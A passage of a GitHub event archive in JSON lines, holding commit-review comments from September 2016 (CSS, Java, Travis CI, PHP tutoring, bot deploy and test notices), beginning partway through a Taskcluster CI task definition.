\"aws-provisioner-v1\",\n                    \"routes\": [\n                        \"index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\"\n                    ],\n                    \"workerType\": \"github-worker\",\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ]\n                        },\n                        \"data\": {\n                            \"base\": {\n                                \"sha\": \"a41b2c9df1641b2776a283324acc78675a0ed251\",\n                                \"user\": {\n                                    \"login\": \"mozilla-releng\"\n                                }\n                            },\n                            \"head\": {\n                                \"sha\": \"b186e5d971d142a78626b757fde3dfc47128c213\",\n                                \"user\": {\n                                    \"email\": \"gregory.szorc@gmail.com\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 600,\n                        \"image\": \"grenade/opencloudconfig\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"--login\",\n                            \"-c\",\n                            \"git clone --quiet https://github.com/indygreg/OpenCloudConfig.git && cd OpenCloudConfig && git checkout hg-checkout-fixes && echo \\\"do lint stuff here\\\"\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 12,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/OpenCloudConfig.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"a41b2c9df1641b2776a283324acc78675a0ed251\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/indygreg/OpenCloudConfig.git\",\n                            \"GITHUB_HEAD_USER\": \"indygreg\",\n                            \"GITHUB_HEAD_SHA\": \"b186e5d971d142a78626b757fde3dfc47128c213\",\n                            \"GITHUB_HEAD_BRANCH\": \"hg-checkout-fixes\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"gregory.szorc@gmail.com\"\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Validate submission (not implemented)\",\n                        \"description\": \"todo: run a linter against json and powershell files\",\n                        \"owner\": \"gregory.szorc@gmail.com\",\n                        \"source\": \"https://github.com/indygreg/OpenCloudConfig.git\"\n                    },\n                    \"created\": \"2016-09-26T23:45:56.778Z\",\n                    \"deadline\": \"2016-09-27T23:45:56.778Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"EscBRAoPQgeDMk2QWNWQeA\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-27T23:45:56.778Z\"\n                },\n                \"time\": \"2016-09-26T23:45:56.897Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:index.project.releng.opencloudconfig.v1.revision.b186e5d971d142a78626b757fde3dfc47128c213.validation\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/OpenCloudConfig:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-26T23:45:56Z"}
{"id":"4621158185","type":"CommitCommentEvent","actor":{"login":"baskwo"},"repo":{"name":"NapDo/cropt"},"payload":{"comment":{"id":19182490,"position":9,"line":9,"path":"src/cropt/Cropt.java","commit_id":"ff216b036b2a50f1221bf6bddfa738e25b41d67e","created_at":"2016-09-26T23:46:05Z","updated_at":"2016-09-26T23:46:05Z","body":"Why are you doing that"}},"created_at":"2016-09-26T23:46:05Z"}
{"id":"4621159727","type":"CommitCommentEvent","actor":{"login":"jakehlee"},"repo":{"name":"columbiaspace/columbiaspace.org"},"payload":{"comment":{"id":19182497,"position":null,"line":null,"path":null,"commit_id":"41508e9a3ba6c1676a9b76a74d118ab8489156d4","created_at":"2016-09-26T23:46:30Z","updated_at":"2016-09-26T23:46:30Z","body":"lol yeah sorry for my bad css, I did say nuke it right after "}},"created_at":"2016-09-26T23:46:30Z"}
{"id":"4621165346","type":"CommitCommentEvent","actor":{"login":"baskwo"},"repo":{"name":"NapDo/cropt"},"payload":{"comment":{"id":19182517,"position":50,"line":50,"path":"src/cropt/Cropt.java","commit_id":"ff216b036b2a50f1221bf6bddfa738e25b41d67e","created_at":"2016-09-26T23:48:08Z","updated_at":"2016-09-26T23:48:08Z","body":"Don't return something empty. If the algo goes there throw something"}},"created_at":"2016-09-26T23:48:08Z"}
{"id":"4621167198","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19182521,"position":null,"line":null,"path":null,"commit_id":"0596b440bf60e72b8fe1a47f8438db6208788082","created_at":"2016-09-26T23:48:39Z","updated_at":"2016-09-26T23:48:39Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/138d94262acf87c47e222e4d1efac1876fa067e8/source/docs/assets/js/main.js)\n- [docs/guides/terminus](https://terminusma-static-docs.pantheonsite.io/docs/guides/terminus)\n- [Gruntfile.js](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/Gruntfile.js)\n- [composer.json](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/composer.json)\n- [package.json](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/package.json)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_partials/footer_scripts.html)\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/default.html)\n- [source/_views/posts.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/posts.html)\n- [source/_views/taxon.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/taxon.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/css/main.css)\n- [source/docs/assets/images/clippy.svg](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/images/clippy.svg)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf)\n"}},"created_at":"2016-09-26T23:48:39Z"}
{"id":"4621167219","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19182522,"position":null,"line":null,"path":null,"commit_id":"be156db125f0de40f6031b913bd781daa9bc1396","created_at":"2016-09-26T23:48:40Z","updated_at":"2016-09-26T23:48:40Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/138d94262acf87c47e222e4d1efac1876fa067e8/source/docs/assets/js/main.js)\n- [docs/guides/terminus](https://terminusma-static-docs.pantheonsite.io/docs/guides/terminus)\n- [Gruntfile.js](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/Gruntfile.js)\n- [composer.json](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/composer.json)\n- [package.json](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/package.json)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_partials/footer_scripts.html)\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/default.html)\n- [source/_views/posts.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/posts.html)\n- [source/_views/taxon.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/taxon.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/css/main.css)\n- [source/docs/assets/images/clippy.svg](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/images/clippy.svg)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/be156db125f0de40f6031b913bd781daa9bc1396/source/_partials/terminus_navbar.html)\n"}},"created_at":"2016-09-26T23:48:40Z"}
{"id":"4621170301","type":"CommitCommentEvent","actor":{"login":"baskwo"},"repo":{"name":"NapDo/cropt"},"payload":{"comment":{"id":19182528,"position":266,"line":266,"path":"src/cropt/Cropt.java","commit_id":"ff216b036b2a50f1221bf6bddfa738e25b41d67e","created_at":"2016-09-26T23:49:35Z","updated_at":"2016-09-26T23:49:35Z","body":"Nop. Again. Throw"}},"created_at":"2016-09-26T23:49:35Z"}
{"id":"4621171038","type":"CommitCommentEvent","actor":{"login":"JayhawkZombie"},"repo":{"name":"JayhawkZombie/EECS581Project"},"payload":{"comment":{"id":19182530,"position":null,"line":null,"path":null,"commit_id":"747a35e27a7fccfc78e12729715fcb065b453e8b","created_at":"2016-09-26T23:49:48Z","updated_at":"2016-09-26T23:49:48Z","body":"We might want to revert this commit out of master, then add it back in so it doesn't mess up the repo structure.  It goes EECS581Project > EECS581Project and each folder has different code for the Engine.  It's gonna make my compiler explode if I pull it down (and we should try to keep anything specific to visual studio out of here, per the .gitignore).\r\nProbably best to add code in a new branch until you're done and ready to merge the whole thing, like the branch for the UI skeleton."}},"created_at":"2016-09-26T23:49:48Z"}
{"id":"4621171376","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19182531,"position":null,"line":null,"path":null,"commit_id":"211bb957b88697b32b95b23f72f1a1db53fafdb0","created_at":"2016-09-26T23:49:53Z","updated_at":"2016-09-26T23:49:53Z","body":"I know and it was self explanatory. Thanks."}},"created_at":"2016-09-26T23:49:53Z"}
{"id":"4621174508","type":"CommitCommentEvent","actor":{"login":"stormpython"},"repo":{"name":"stormpython/heatmap"},"payload":{"comment":{"id":19182541,"position":null,"line":null,"path":null,"commit_id":"eaa77a043402f278efbb1fa70928ecd3306b7793","created_at":"2016-09-26T23:50:49Z","updated_at":"2016-09-26T23:50:49Z","body":"Closes #42."}},"created_at":"2016-09-26T23:50:49Z"}
{"id":"4621181213","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"Kboneil/rho_code_challenge_1"},"payload":{"comment":{"id":19182563,"position":20,"line":21,"path":"3-conditionals/if.js","commit_id":"7fb0b644e7f675bb3563e5933b4589a5101a66b7","created_at":"2016-09-26T23:52:46Z","updated_at":"2016-09-26T23:52:46Z","body":"This should be an `else if` because we only explicitly want to hand 2 cases:\r\n\r\n1. if `first > second`"}},"created_at":"2016-09-26T23:52:46Z"}
{"id":"4621181971","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19182565,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-26T23:53:01Z","updated_at":"2016-09-26T23:53:01Z","body":"OOh, progress, found syntax that compiles.  As long as the parameters change it's happy, which as we're passing in changing parameter types:\r\n```c#\r\npublic OneOfSwitcher<T0, T1> When(Action<T0> action) { ... }\r\npublic OneOfSwitcher<T0, T1> When(Action<T1> action) { ... }\r\n```\r\n\r\nWhich looks like this when used:\r\n```c#\r\n            x.Switch()\r\n                .When((bool bln) => ... )\r\n                .When((string str) => ... )\r\n                .Otherwise(v => ... );\r\n```\r\n\r\nThis would only allow T{n} types within the switch, at compile time.  "}},"created_at":"2016-09-26T23:53:01Z"}
{"id":"4621189977","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19182598,"position":null,"line":null,"path":null,"commit_id":"ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2","created_at":"2016-09-26T23:55:29Z","updated_at":"2016-09-26T23:55:29Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (2196 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-87.95%25-red.svg)</a> \n"}},"created_at":"2016-09-26T23:55:29Z"}
{"id":"4621194421","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"Kboneil/rho_code_challenge_1"},"payload":{"comment":{"id":19182614,"position":22,"line":27,"path":"6-objects/literal.js","commit_id":"7fb0b644e7f675bb3563e5933b4589a5101a66b7","created_at":"2016-09-26T23:56:49Z","updated_at":"2016-09-26T23:56:49Z","body":"What we were expecting was more along the lines of a method that printed out the address like so:\r\n\r\n```\r\nprime.newMethod = function() {\r\n  console.log(this.streetAddress, ' ', this.city, ' ', this.state, ' ', this.zip);\r\n}\r\n```"}},"created_at":"2016-09-26T23:56:49Z"}
{"id":"4621196857","type":"CommitCommentEvent","actor":{"login":"pixyzehn"},"repo":{"name":"nerdishbynature/git2go-translation"},"payload":{"comment":{"id":19182622,"position":9,"line":194,"path":"ja.lproj/Localizable.strings","commit_id":"5cb60dcd7993c68daa8f88c9c5c4816f035d0c87","created_at":"2016-09-26T23:57:34Z","updated_at":"2016-09-26T23:57:34Z","body":"Great😉"}},"created_at":"2016-09-26T23:57:34Z"}
{"id":"4621198590","type":"CommitCommentEvent","actor":{"login":"Alkallid"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19182628,"position":null,"line":null,"path":null,"commit_id":"df6ce0161f0ef6341493b05aae1e4ed8b6797bb5","created_at":"2016-09-26T23:58:07Z","updated_at":"2016-09-26T23:58:07Z","body":"Great, now I don't have to memorize this."}},"created_at":"2016-09-26T23:58:07Z"}
{"id":"4621202879","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"motbsitu/rho_code_challenge_1"},"payload":{"comment":{"id":19182640,"position":8,"line":8,"path":"1-variables/operators.js","commit_id":"0c1684f1ebb1116cc3f90182d1da8e2e55bb5772","created_at":"2016-09-26T23:59:20Z","updated_at":"2016-09-26T23:59:20Z","body":"Ideally, we would like to reassign the value here: `peeps = peeps - 1`"}},"created_at":"2016-09-26T23:59:20Z"}
{"id":"4615514186","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/relaxr-landing-page"},"payload":{"comment":{"id":19166960,"position":47,"line":47,"path":"css/style.css","commit_id":"0980fd18136a2740530677b4008e34e55cf53469","created_at":"2016-09-26T03:00:15Z","updated_at":"2016-09-26T03:00:15Z","body":"\"Open Sans\" should be wrapped in quotes and don't forget to have a fallback like \"sans-serif\"."}},"created_at":"2016-09-26T03:00:15Z"}
{"id":"4615515454","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166962,"position":5,"line":12,"path":"hello_world/views.py","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T03:00:48Z","updated_at":"2016-09-26T03:00:48Z","body":"Change from returning a string of text to rendering a template with a `context` `dict` passed with it."}},"created_at":"2016-09-26T03:00:48Z"}
{"id":"4615515726","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/relaxr-landing-page"},"payload":{"comment":{"id":19166963,"position":70,"line":70,"path":"css/style.css","commit_id":"0980fd18136a2740530677b4008e34e55cf53469","created_at":"2016-09-26T03:00:54Z","updated_at":"2016-09-26T03:00:54Z","body":"A class may have been more useful here than nesting the divs so it's easier to know what you're styling."}},"created_at":"2016-09-26T03:00:54Z"}
{"id":"4615516646","type":"CommitCommentEvent","actor":{"login":"oanhnn"},"repo":{"name":"deployphp/deployer"},"payload":{"comment":{"id":19166965,"position":null,"line":null,"path":null,"commit_id":"f9b8b73b568afb6f8894ec0b52b9649a9dfc6c83","created_at":"2016-09-26T03:01:14Z","updated_at":"2016-09-26T03:01:14Z","body":"This issue is resolved by PR #676 . And it is merged to master.\r\nIt will be available on next version 3.x of Deployer !"}},"created_at":"2016-09-26T03:01:14Z"}
{"id":"4615516674","type":"CommitCommentEvent","actor":{"login":"hhkbp2"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19166966,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T03:01:15Z","updated_at":"2016-09-26T03:01:15Z","body":"The `iter.fold` works the same as a counter, but it's better way to iterate the vector since it's designed specifically to 'iterate' the collection type."}},"created_at":"2016-09-26T03:01:15Z"}
{"id":"4615517009","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/relaxr-landing-page"},"payload":{"comment":{"id":19166968,"position":73,"line":73,"path":"css/style.css","commit_id":"0980fd18136a2740530677b4008e34e55cf53469","created_at":"2016-09-26T03:01:24Z","updated_at":"2016-09-26T03:01:24Z","body":" I would've wrapped all the text in a container and gave it this width instead of on each individual text item."}},"created_at":"2016-09-26T03:01:24Z"}
{"id":"4615519206","type":"CommitCommentEvent","actor":{"login":"fashioncj"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19166974,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T03:02:25Z","updated_at":"2016-09-26T03:02:25Z","body":"Quote:\r\nOriginally Posted by bendlas \r\nThanks for your work.\r\nUnfortunately, I can't use usb debugging with the latest build (cm-14.0-20160922-UNOFFICIAL-thea), because the confirmation dialog won't show up on the phone and the device stays at \"unauthorized\" in `adb devices`.\r\nI've tried various combinations of fixes, including nuking ~/.android; running `adb start-server` as root; doing a full wipe and reinstalling from TWRP.\r\nI could not try revoking USB grants, as there doesn't seem to be a corresponding developer option in this build.\r\nNothing of interest shows up in logcat. Is there anything else I could try?\r\n\r\nWill be fixed in next \"nightly\".\r\n----\r\nit seems no fix until now"}},"created_at":"2016-09-26T03:02:25Z"}
{"id":"4615519602","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/relaxr-landing-page"},"payload":{"comment":{"id":19166975,"position":11,"line":11,"path":"index.html","commit_id":"0980fd18136a2740530677b4008e34e55cf53469","created_at":"2016-09-26T03:02:37Z","updated_at":"2016-09-26T03:02:37Z","body":"The name here should be \"description\". That defines the type of meta tag."}},"created_at":"2016-09-26T03:02:37Z"}
{"id":"4615519674","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19166976,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T03:02:39Z","updated_at":"2016-09-26T03:02:39Z","body":"> こちらは書き間違いになりますが、理解が追いついていない箇所もあると思います。\r\nまた、初めてこちらの課題に取り組んでからかなり時間が空いてしまっているので、初期の頃に記載したものorそれを引用してきたものはこのような間違いがあるかもしれません。見直しをしなければ行けないです…。\r\n\r\nなるほどです！了解いたしました。確かに間が空くと忘れてしまう箇所もありますよね。これから繰り返しやることで身につければ良いので、コピペ時は少し気をつけつつ、改善していければ良いのではないかと思います。\r\n\r\n> 個人的にはちょっと質問をし過ぎかなと…もう少し自分で頑張ってみたほうがというところも、時間が限られていることもありやむなく質問させていただいたりしてしまっています汗\r\n\r\n確かに初期&中期頃よりご自身で頑張って解決できることは多くなってきているので、ご自身で解決されるほうに時間を割いていただきたいということもありますが(そちらのほうが結果的には力がつくため)、今は残り日数との関係で「やむなく」というのも理解しております。\r\n\r\n> その他私の学習の進め方の問題点や、コードを御覧頂いて理解していないのでは、と思われるところはございますでしょうか。\r\n\r\nこちらに関しては思い当たる点がありますので探してメンションいたします。"}},"created_at":"2016-09-26T03:02:39Z"}
{"id":"4615520566","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/relaxr-landing-page"},"payload":{"comment":{"id":19166979,"position":41,"line":41,"path":"index.html","commit_id":"0980fd18136a2740530677b4008e34e55cf53469","created_at":"2016-09-26T03:03:00Z","updated_at":"2016-09-26T03:03:00Z","body":"The inner `<p>` tag wasn't needed here."}},"created_at":"2016-09-26T03:03:00Z"}
{"id":"4615525361","type":"CommitCommentEvent","actor":{"login":"adinadin111"},"repo":{"name":"kulichkov-roman/smb"},"payload":{"comment":{"id":19166990,"position":null,"line":null,"path":null,"commit_id":"274ee2e5365c303a5fe8ae0f28f3d8af55d89c0a","created_at":"2016-09-26T03:05:10Z","updated_at":"2016-09-26T03:05:10Z","body":"Убрал"}},"created_at":"2016-09-26T03:05:10Z"}
{"id":"4615525390","type":"CommitCommentEvent","actor":{"login":"sminnee"},"repo":{"name":"open-sausages/silverstripe-framework"},"payload":{"comment":{"id":19166991,"position":5,"line":37,"path":".travis.yml","commit_id":"e97ac2b518cc8d4a0a33a8024a5c914618bbffe2","created_at":"2016-09-26T03:05:11Z","updated_at":"2016-09-26T03:05:11Z","body":"Use `PHPUNIT_COVERAGE_TEST=1` instead and drop `PHPUNIT_TEST=1`"}},"created_at":"2016-09-26T03:05:11Z"}
{"id":"4615527150","type":"CommitCommentEvent","actor":{"login":"pomegranited"},"repo":{"name":"open-craft/edx-platform"},"payload":{"comment":{"id":19166998,"position":2,"line":1,"path":"common/static/common/js/discussion/discussion_router.js","commit_id":"a3f1c55ddc09130f194b8b5565aa445e96a8ee8d","created_at":"2016-09-26T03:05:58Z","updated_at":"2016-09-26T03:05:58Z","body":"`Thread` is not mentioned in this file?"}},"created_at":"2016-09-26T03:05:58Z"}
{"id":"4615527327","type":"CommitCommentEvent","actor":{"login":"sminnee"},"repo":{"name":"open-sausages/silverstripe-framework"},"payload":{"comment":{"id":19166999,"position":29,"line":65,"path":".travis.yml","commit_id":"e97ac2b518cc8d4a0a33a8024a5c914618bbffe2","created_at":"2016-09-26T03:06:03Z","updated_at":"2016-09-26T03:06:03Z","body":"Change to ` \"if [ \\\"$PHPUNIT_COVERAGE_TEST\\\" = \\\"1\\\" ]`"}},"created_at":"2016-09-26T03:06:03Z"}
{"id":"4615529246","type":"CommitCommentEvent","actor":{"login":"sminnee"},"repo":{"name":"open-sausages/silverstripe-framework"},"payload":{"comment":{"id":19167005,"position":30,"line":66,"path":".travis.yml","commit_id":"e97ac2b518cc8d4a0a33a8024a5c914618bbffe2","created_at":"2016-09-26T03:06:56Z","updated_at":"2016-09-26T03:06:56Z","body":"The aforementioned changes will stop this line from executing a 2nd, redundant test run.\r\n\r\nWe could add a 3rd conditional here but I think it's cleaner to make a more specific variable."}},"created_at":"2016-09-26T03:06:56Z"}
{"id":"4615529265","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167006,"position":5,"line":5,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T03:06:57Z","updated_at":"2016-09-26T03:06:57Z","body":"`new ◯◯` の部分や、`$pdo = new PDO('....')` したのちの\r\n`$pdo->prepare($sql);` の部分はなんとなく理解できていますでしょうか。\r\n\r\nこの部分は今は深く理解しようとすると時間を要する箇所ですので、なんとなくで十分なのですが、いかがでしょう。"}},"created_at":"2016-09-26T03:06:57Z"}
{"id":"4615530086","type":"CommitCommentEvent","actor":{"login":"ARSekkat"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19167007,"position":75,"line":9343,"path":"src/isomedia/box_code_base.c","commit_id":"19863d71e326d47e508d8641f34c39de7c9e443d","created_at":"2016-09-26T03:07:20Z","updated_at":"2016-09-26T03:07:20Z","body":"L\n\nLe 23 sept. 2016 17:28, \"Romain Bouqueau\" <notifications@github.com> a\nécrit :\n\n> why not add ptr->asset_id_length directly?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gpac/gpac/commit/19863d71e326d47e508d8641f34c39de7c9e443d#commitcomment-19149105>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARy9vpxrzNvu2WSF8SP94PzUuA_zJplgks5qs_4wgaJpZM4KFKIp>\n> .\n>\n"}},"created_at":"2016-09-26T03:07:20Z"}
{"id":"4615530935","type":"CommitCommentEvent","actor":{"login":"alexmesa987"},"repo":{"name":"jbtibor/SmartThings"},"payload":{"comment":{"id":19167008,"position":null,"line":null,"path":null,"commit_id":"b01bc785d410450ad3e91f6c4aa374e8d5ad78d9","created_at":"2016-09-26T03:07:46Z","updated_at":"2016-09-26T03:07:46Z","body":"Hi this is great I follow all steps and it work but now on the phone is asking me TaHoma account log in information, how do i link my blinds now"}},"created_at":"2016-09-26T03:07:46Z"}
{"id":"4615530997","type":"CommitCommentEvent","actor":{"login":"RyanYizhaoHuang"},"repo":{"name":"RyanYizhaoHuang/hello-world"},"payload":{"comment":{"id":19167009,"position":4,"line":5,"path":"README.md","commit_id":"14b0235559aebc3b64eebd7b3da4df0c331a9966","created_at":"2016-09-26T03:07:47Z","updated_at":"2016-09-26T03:07:47Z","body":"Why showed -"}},"created_at":"2016-09-26T03:07:47Z"}
{"id":"4615531703","type":"CommitCommentEvent","actor":{"login":"RyanYizhaoHuang"},"repo":{"name":"RyanYizhaoHuang/hello-world"},"payload":{"comment":{"id":19167010,"position":4,"line":5,"path":"README.md","commit_id":"14b0235559aebc3b64eebd7b3da4df0c331a9966","created_at":"2016-09-26T03:08:10Z","updated_at":"2016-09-26T03:08:10Z","body":"Don't tell you."}},"created_at":"2016-09-26T03:08:10Z"}
{"id":"4615532556","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167014,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-26T03:08:33Z","updated_at":"2016-09-26T03:08:33Z","body":"> その他私の学習の進め方の問題点や、コードを御覧頂いて理解していないのでは、と思われるところはございますでしょうか。\r\n\r\nここあたりいかがでしょうか。\r\nhttps://github.com/hdfukuoka1985/phptrainning/commit/118c90c3a194e7d67bbac0ab761828654b5d5a4a#commitcomment-19167006"}},"created_at":"2016-09-26T03:08:33Z"}
{"id":"4615533027","type":"CommitCommentEvent","actor":{"login":"Baddaboo"},"repo":{"name":"IolaniDev/iobot"},"payload":{"comment":{"id":19167015,"position":null,"line":null,"path":null,"commit_id":"1dc1cbc8b9b222ab648b3a9a6fcef1ef3c3a9f18","created_at":"2016-09-26T03:08:48Z","updated_at":"2016-09-26T03:08:48Z","body":"Wow someone was thinking ahead weren't they"}},"created_at":"2016-09-26T03:08:48Z"}
